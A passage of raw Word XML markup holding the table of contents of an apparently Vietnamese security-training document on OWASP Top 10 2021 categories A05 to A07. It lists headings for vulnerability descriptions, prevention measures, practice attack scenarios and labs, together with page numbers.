                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Biện pháp ngăn chặn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909843 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04E8A042" w14:textId="6CFD7544" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909844" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kịch bản tấn công thực hành</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909844 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B58BD38" w14:textId="1B8A9D62" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909845" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bài thực hành – Lab 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909845 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="466004DB" w14:textId="3452179D" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909846" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A05:2021 – Security Misconfiguration</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909846 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6CA7149B" w14:textId="0FEC21DA" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909847" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mô tả lỗ hổng</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909847 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60CE7059" w14:textId="00793894" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909848" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Biện pháp ngăn chặn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909848 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6AB8F1DA" w14:textId="179BE621" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909849" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kịch bản tấn công thực hành</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909849 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="54232B22" w14:textId="41C02785" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909850" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bài thực hành – Lab 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909850 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="643AA99E" w14:textId="510F0640" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909851" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A06:2021 – Vulnerable and Outdated Components</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909851 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3989EC50" w14:textId="11B676BC" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909852" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mô tả lỗ hổng</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909852 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B3B91B3" w14:textId="141EBB49" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909853" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Biện pháp ngăn chặn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909853 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="37517BA9" w14:textId="65AF8CCD" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909854" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kịch bản tấn công thực hành</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909854 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C01D125" w14:textId="34F46391" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909855" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bài thực hành – Lab 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909855 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7CC14E9B" w14:textId="68C877D3" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909856" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A07:2021 – Identification and Authentication Failures</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909856 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>46</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1EF18C2B" w14:textId="6C6BBD58" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909857" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mô tả lỗ hổng</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
